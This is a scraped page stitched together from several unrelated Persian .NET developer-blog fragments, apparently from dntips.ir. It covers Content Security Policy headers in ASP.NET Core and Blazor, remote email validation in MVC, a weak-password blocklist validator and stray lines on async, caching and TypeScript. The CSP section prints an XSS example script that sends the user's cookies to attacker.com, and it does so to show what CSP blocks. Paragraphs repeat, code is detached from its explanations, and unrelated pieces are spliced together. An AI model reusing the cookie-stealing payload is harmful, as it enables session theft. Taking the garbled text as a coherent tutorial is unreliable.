سلام. اگر بخواهیم یک کار نسبتاً زمانبر که IO هم هست را توسط این کتابخانه در فواصل زمانی معین اجرا کنیم، میشه از async و await استفاده کرد؟
چجوری میشه با jasmine یک تست برای متدی که $http.post رو در یک سرویس انگولار پیاده کرده نوشت؟ تست متدهای async در انگولار چجوریه ؟
خبر خوش اینکه انجام امور async در سی شارپ 5 به کمک واژه کلیدی await ، همانند مقصود دو مقاله فوق به سادگی در اختیار و کنترل برنامه نویسها خواهد بود.
تابحال مطالب زیادی را در مورد تمیزکردن ورودیهای کاربران، توسط ابزارهای Anti-XSS مطالعه کردهاید:
- «ایجاد یک ActionFilter جهت تمیز کردن اطلاعات ورودی در ASP.NET Core»
هدف تمام آنها این است که اگر اطلاعاتی از کاربر دریافت شد، پس از تمیز شدن، مشکلی با نمایش آنها نداشته باشیم و به محض نمایش یک صفحه، قطعه کد جاوااسکریپتی موجود در ورودی اولیهی کاربر، در پشت صحنه به صورت خودکار اجرا نشود. اما ... هرچقدر هم سعی کنیم، به مواردی خواهیم رسید که ممکن است توسط این «تمیز کنندههای ورودی» پوشش داده نشوند و دست آخر، قابلیت اجرایی داشته باشند. در این حالت به مفهوم دیگری میرسیم به نام Content security policy headers و یا به اختصار CSP که اساسا اجرای هر نوع اسکریپت تزریق شدهای را در صفحه، ممنوع میکند:
- «افزودن هدرهای Content Security Policy به برنامههای ASP.NET» برای مثال زمانیکه تنظیم CSP ابتدایی زیر را داریم:
یعنی مرورگر فقط در این صفحه، اطلاعاتی را که متعلق به سایت و دومین جاری است، بارگذاری میکند. در این حالت دیگر ویدیوهای یوتیوب معرفی شده، فایلهای CSS و یا جاوااسکریپتی دریافتی از یک CDN دیگر اجرا نمیشوند؛ چون بارگذاری نخواهند شد. همچنین دیگر نمیتوان یک قطعهی اسکریپتی را هم داخل صفحه به صورت inline تعریف و اجرا کرد. یعنی حداقل اسکریپتهای داخل صفحهای Google analytics هم از کار خواهند افتاد. که این رفتار دقیقا مطلوب ما است؛ چون نمیخواهیم هیچ نوع اسکریپت واقع در صفحه - خصوصا موارد دریافتی از کاربران (مانند مثال زیر) بهعنوان ورودی! - اجرا شوند. برای نمونه در مثال زیر که پس از نمایش اطلاعات دریافتی از کاربر، در صفحه اجرا میشود، کوکیهای کاربر جاری را جهت ثبت، در اختیار سایت دیگری قرار میدهد:
سؤال: چگونه توسط CSP، اسکریپتهای inline خوب را از بد تشخیص دهیم؟
یک روش مواجه شدن با منع اجرای اسکریپتهای inline، مجاز اعلام کردن تمام آنها با فعالسازی و ذکر تنظیم unsafe-inline است که عملا CSP را بیمصرف میکند. روش دیگر آن، معرفی هش اسکریپتهای inline مجاز است. اگر هدرهای CSP را فعال کرده باشیم، مرورگر زمانیکه به قطعه کد اسکریپتی که نمیخواهد آنرا اجرا کند برسد، یک چنین پیام خطایی را در developer tools خود صادر میکند:
همانطور که مشاهده میکنید، یک هش از نوع SHA-256 نیز در اینجا ذکر شدهاست. این هش دقیقا مرتبط با قطعه کدی است که خود ما در صفحه قرار دادهایم و یک «اسکریپت خوب» بهشمار میرود. روش معرفی آن به هدرهای CSP نیز به صورت زیر است:
در اینجا به نحو صریحی مشخص میکنیم که دقیقا کدام اسکریپت inline، مجاز به اجرا است؛ مابقی موارد به صورت خودکار بلاک خواهند شد. بدیهی است هر تغییری در اسکریپت قرار گرفته شدهی در صفحه، سبب تغییر هش آن خواهد شد و باید مجددا از طریق developer tools مرورگر و پیام خطایی که صادر میکند، مقدار این هش را به روز کرد.
معرفی کتابخانهی NetEscapades.AspNetCore.SecurityHeaders
جهت سهولت تعریف و اعمال هدرهای CSP در تمام برنامههای مبتنی بر ASP.NET Core، منجمله Blazor server و Blazor WASM هاست شده، میتوان از میانافزار NetEscapades.AspNetCore.SecurityHeaders استفاده کرد. برای اینکار ابتدا نیاز است بستهی نیوگت آنرا معرفی کرد:
و سپس به نحو زیر، یکی از امنترین تنظیمات را تدارک دید:
چند نکته:
- این تنظیمات برای Blazor WASM تهیه شدهاند. در این حالت ذکر UnsafeEval برای اجرای اسکریپتهای فریمورک آن (حداقل تا نگارش 7) ضروری است. اگر از ASP.NET Core و یا Blazor Server استفاده میکنید، این تنظیم (UnsafeEval) را حذف کنید.
- روش معرفی هشها را هم در صورت نیاز، توسط متد WithHash256 در این مثال مشاهده میکنید.
پس از تدارک کلاس تنظیمات فوق، روش استفادهی از آن در فایل Program.cs و توسط میانافزار SecurityHeaders، به صورت زیر است:
این تنظیم سبب میشود تا هدرهای زیر به صورت خودکار تولید و به هر Response ای اضافه شوند:
- «ایجاد یک ActionFilter جهت تمیز کردن اطلاعات ورودی در ASP.NET Core»
- «افزودن هدرهای Content Security Policy به برنامههای ASP.NET» برای مثال زمانیکه تنظیم CSP ابتدایی زیر را داریم:
Content-Security-Policy: default-src 'self'
<script>location.href="http://attacker.com/Cookies/?c="+encodeURIComponent(document.cookie);</script>
سؤال: چگونه توسط CSP، اسکریپتهای inline خوب را از بد تشخیص دهیم؟
یک روش مواجه شدن با منع اجرای اسکریپتهای inline، مجاز اعلام کردن تمام آنها با فعالسازی و ذکر تنظیم unsafe-inline است که عملا CSP را بیمصرف میکند. روش دیگر آن، معرفی هش اسکریپتهای inline مجاز است. اگر هدرهای CSP را فعال کرده باشیم، مرورگر زمانیکه به قطعه کد اسکریپتی که نمیخواهد آنرا اجرا کند برسد، یک چنین پیام خطایی را در developer tools خود صادر میکند:
Refused to execute inline script because it violates the following Content Security Policy directive:
"script-src 'self' 'unsafe-eval'". Either the 'unsafe-inline' keyword,
a hash ('sha256-Rx2R8WNQO+B6FPfeIU/11a0BScUM6Cq7HdThUsPpjOU='),
or a nonce ('nonce-...') is required to enable inline execution. Content-Security-Policy: default-src 'self'; script-src 'sha256-Rx2R8WNQO+B6FPfeIU/11a0BScUM6Cq7HdThUsPpjOU='
معرفی کتابخانهی NetEscapades.AspNetCore.SecurityHeaders
جهت سهولت تعریف و اعمال هدرهای CSP در تمام برنامههای مبتنی بر ASP.NET Core، منجمله Blazor server و Blazor WASM هاست شده، میتوان از میانافزار NetEscapades.AspNetCore.SecurityHeaders استفاده کرد. برای اینکار ابتدا نیاز است بستهی نیوگت آنرا معرفی کرد:
<ItemGroup> <PackageReference Include="NetEscapades.AspNetCore.SecurityHeaders" Version="0.20.0" /> </ItemGroup>
public static class SecurityHeadersBuilder
{
public static HeaderPolicyCollection GetCsp(bool isDevelopment)
{
var policy = new HeaderPolicyCollection()
.AddFrameOptionsDeny()
.AddXssProtectionBlock()
.AddContentTypeOptionsNoSniff()
.AddReferrerPolicyStrictOriginWhenCrossOrigin()
.AddCrossOriginOpenerPolicy(builder => builder.SameOrigin())
.AddCrossOriginResourcePolicy(builder => builder.SameOrigin())
.AddCrossOriginEmbedderPolicy(builder => builder.RequireCorp())
.AddContentSecurityPolicy(builder =>
{
builder.AddBaseUri().Self();
builder.AddDefaultSrc().Self().From("blob:");
builder.AddObjectSrc().Self().From("blob:");
builder.AddBlockAllMixedContent();
builder.AddImgSrc().Self().From("data:").From("blob:").From("https:");
builder.AddFontSrc().Self();
builder.AddStyleSrc().Self();
builder.AddFrameAncestors().None();
builder.AddConnectSrc().Self();
builder.AddMediaSrc().Self();
builder.AddScriptSrc().Self()
// Specify any additional hashes to permit your required `non-framework` scripts to load.
.WithHash256("Rx2R8WNQO+B6FPfeIU/11a0BScUM6Cq7HdThUsPpjOU=")
// Specify unsafe-eval to permit the `Blazor WebAssembly Mono runtime` to function.
.UnsafeEval();
//TODO: Add api/CspReport/Log action method ...
// https://www.dntips.ir/post/2706
builder.AddReportUri().To("/api/CspReport/Log");
builder.AddUpgradeInsecureRequests();
})
.RemoveServerHeader()
.AddPermissionsPolicy(builder =>
{
builder.AddAccelerometer().None();
builder.AddAutoplay().None();
builder.AddCamera().None();
builder.AddEncryptedMedia().None();
builder.AddFullscreen().All();
builder.AddGeolocation().None();
builder.AddGyroscope().None();
builder.AddMagnetometer().None();
builder.AddMicrophone().None();
builder.AddMidi().None();
builder.AddPayment().None();
builder.AddPictureInPicture().None();
builder.AddSyncXHR().None();
builder.AddUsb().None();
});
if (!isDevelopment)
{
// maxAge = one year in seconds
policy.AddStrictTransportSecurityMaxAgeIncludeSubDomains();
}
policy.ApplyDocumentHeadersToAllResponses();
return policy;
}
} - این تنظیمات برای Blazor WASM تهیه شدهاند. در این حالت ذکر UnsafeEval برای اجرای اسکریپتهای فریمورک آن (حداقل تا نگارش 7) ضروری است. اگر از ASP.NET Core و یا Blazor Server استفاده میکنید، این تنظیم (UnsafeEval) را حذف کنید.
- روش معرفی هشها را هم در صورت نیاز، توسط متد WithHash256 در این مثال مشاهده میکنید.
پس از تدارک کلاس تنظیمات فوق، روش استفادهی از آن در فایل Program.cs و توسط میانافزار SecurityHeaders، به صورت زیر است:
var app = builder.Build(); // ... var headerPolicyCollection = SecurityHeadersBuilder.GetCsp(app.Environment.IsDevelopment()); app.UseSecurityHeaders(headerPolicyCollection); app.UseHttpsRedirection(); // ...
Content-Security-Policy:base-uri 'self'; default-src 'self' blob:; object-src 'self' blob:; block-all-mixed-content; img-src 'self' data: blob: https:; font-src 'self'; style-src 'self'; frame-ancestors 'none'; connect-src 'self'; media-src 'self'; script-src 'self' 'sha256-Rx2R8WNQO+B6FPfeIU/11a0BScUM6Cq7HdThUsPpjOU=' 'unsafe-eval'; report-uri /api/CspReport/Log; upgrade-insecure-requests Cross-Origin-Embedder-Policy:require-corp Cross-Origin-Opener-Policy:same-origin Cross-Origin-Resource-Policy:same-origin Permissions-Policy:accelerometer=(), autoplay=(), camera=(), encrypted-media=(), fullscreen=*, geolocation=(), gyroscope=(), magnetometer=(), microphone=(), midi=(), payment=(), picture-in-picture=(), sync-xhr=(), usb=() Referrer-Policy:strict-origin-when-cross-origin X-Content-Type-Options:nosniff X-Frame-Options:DENY X-Xss-Protection:1; mode=block
با بررسی فیلد مورد نظر در خروجی html تولید شده، میتوانید صحت عملکرد برنامه را بررسی کنید.
مثال زیر در این زمینه میباشد که مدل آن در یک class library دیگر است (البته در اینجا به جای استفاده از نام اکشن و نام کنترلر از نام روت استفاده شده است)
حالت اول: مدل برنامه در حالتی که فقط فیلد مورد نظر باید بررسی شود (ایجاد کاربر):
namespace Project.Models
{
public class EmployeeCreateModel
{
[Required]
[Display(Name = "آدرس ایمیل")]
[EmailAddress(ErrorMessage = "لطفاً {0} معتبر وارد کنید.")]
[Remote("UserExistByEmailValidation",
HttpMethod = "POST",
ErrorMessage = "ایمیل وارد شده هم اکنون توسط یکی از کاربران مورد استفاده است.")]
public string Email { get; set; }
...
}
} - حالت دوم: مدل برنامه در حالتی که به جز فیلد مورد نظر باید یک فیلد دیگر نیز مورد بررسی قرار گیرد (ویرایش کاربر):
namespace Project.Models
{
public class EmployeeEditModel
{
public int Id { get; set; }
[Required]
[Display(Name = "آدرس ایمیل")]
[EmailAddress(ErrorMessage = "لطفاً {0} معتبر وارد کنید.")]
[Remote("EmailExistForOtherUserValidation",
AdditionalFields = "Id",
HttpMethod = "POST",
ErrorMessage = "ایمیل وارد شده هم اکنون توسط یکی از کاربران مورد استفاده است.")]
public string Email { get; set; }
....
}
} namespace Project.Web.Controllers
{
[RoutePrefix("UserValidation")]
[Route("{Action}")]
[OutputCache(Location = OutputCacheLocation.None, NoStore = true)]
public partial class UserValidationController : Controller
{
readonly IUserService<User> _userService;
readonly IUnitOfWork _uow;
public UserValidationController(IUnitOfWork uow, IUserService<User> userService)
{
_userService = userService;
_uow = uow;
}
[HttpPost]
[Route("~/CheckEmail", Name = "UserExistByEmailValidation")]
public virtual JsonResult CheckEmail(string email)
{
return Json(!_userService.UserExistsByEmail(email));
}
[HttpPost]
[Route("~/CheckEmailForOtherUser", Name = "EmailExistForOtherUserValidation")]
public virtual JsonResult CheckEmailForOtherUser(string email, int id)
{
return Json(!_userService.EmailExistForOtherUser(email, id));
}
}
} - حالت اول:
- حالت دوم (فیلد Id هم ارسال میگردد):
در صورتی که خروجی درست بود، باید scriptها را مورد بررسی قرار دهید که یکی از متدوالترین آنها
@section Scripts {
@Scripts.Render("~/bundles/jqueryval")
} هر ساله لیستی از پرکاربردترین کلمات عبور کاربران در دنیا، منتشر میشود که یک نمونه از آنرا در اینجا میتوان مشاهده کرد:
«Splashdata، توسعه دهنده نرم افزارهای امنیتی، فهرست سالانه خود را از رایجترین رمزهای عبور منتشر کرده است.»
میشود از این لیست برای بهبود پروسه ثبت نام در یک سایت استفاده کرد و همان زمان که کاربر کلمه عبور ضعیفی را وارد کرده است، به او پیغام داد که «کلمه عبور وارد شده را راحت میتوان حدس زد!»
متد الحاقی IsSafePasword فوق بررسی میکند که آیا کلمه عبور انتخابی:
- خالی نیست.
- بیشتر از 5 کاراکتر طول دارد.
- تمام حروف بکارگرفته شده در آن یکسان نیستند.
و در ASP.NET MVC با استفاده از قابلیت Remote validation آن استفاده از این متد به نحو زیر خواهد بود:
ابتدا یک اکشن متد به کنترلر ثبت نام در سایت به نحو فوق اضافه خواهد شد.
سپس قسمتی از ViewModel متناظر با صفحه ثبت نام سایت، به شکل زیر اضافه و تعریف میگردد:
«Splashdata، توسعه دهنده نرم افزارهای امنیتی، فهرست سالانه خود را از رایجترین رمزهای عبور منتشر کرده است.»
میشود از این لیست برای بهبود پروسه ثبت نام در یک سایت استفاده کرد و همان زمان که کاربر کلمه عبور ضعیفی را وارد کرده است، به او پیغام داد که «کلمه عبور وارد شده را راحت میتوان حدس زد!»
using System.Linq;
namespace SecurityModule
{
public static class SafePassword
{
public static ISet<string> BadPasswords = new HashSet<string>
{
"password",
"password1",
"123456",
"12345678",
"1234",
"qwerty",
"12345",
"dragon",
"******",
"baseball",
"football",
"letmein",
"monkey",
"696969",
"abc123",
"mustang",
"michael",
"shadow",
"master",
"jennifer",
"111111",
"2000",
"jordan",
"superman",
"harley",
"1234567",
"iloveyou",
"trustno1",
"sunshine",
"123123",
"welcome"
};
public static bool IsSafePasword(this string data)
{
if (string.IsNullOrWhiteSpace(data)) return false;
if (data.Length < 5) return false;
if (BadPasswords.Contains(data.ToLowerInvariant())) return false;
if (data.AreAllCharsEuqal()) return false;
return true;
}
public static bool AreAllCharsEuqal(this string data)
{
if (string.IsNullOrWhiteSpace(data)) return false;
data = data.ToLowerInvariant();
var firstElement = data.ElementAt(0);
var euqalCharsLen = data.ToCharArray().Count(x => x == firstElement);
if (euqalCharsLen == data.Length) return true;
return false;
}
}
}
- خالی نیست.
- بیشتر از 5 کاراکتر طول دارد.
- تمام حروف بکارگرفته شده در آن یکسان نیستند.
و در ASP.NET MVC با استفاده از قابلیت Remote validation آن استفاده از این متد به نحو زیر خواهد بود:
public partial class RegisterController : Controller
{
//...
[HttpPost]
[OutputCache(Location = OutputCacheLocation.None, NoStore = true)]
public virtual ActionResult CheckPassword(string password1)
{
return Json(password1.IsSafePasword());
}
}
سپس قسمتی از ViewModel متناظر با صفحه ثبت نام سایت، به شکل زیر اضافه و تعریف میگردد:
using System.ComponentModel.DataAnnotations;
using System.Web.Mvc;
namespace MyBlog.Models
{
public class RegisterViewModel
{
//...
[Display(Name = "کلمه عبور")]
[Required(ErrorMessage = "لطفا کلمه عبور خود را وارد نمائید")]
[DataType(DataType.Password)]
[StringLength(50, MinimumLength = 5, ErrorMessage = "حداقل طول کلمه عبور 5 حرف است")]
[Remote(action: "CheckPassword", controller: "Register", HttpMethod = "POST",
ErrorMessage = "کلمه عبور وارد شده را راحت میتوان حدس زد!")]
public string Password1 { get; set; }
}
}
One of the most common and effective ways to manage the caching of your assets
is via the Cache-Control HTTP header.
TypeScript 1.8 provides full support for module augmentation, delivers a stronger type system with string literal types, and catches even more common bugs with smarter control flow analysis.
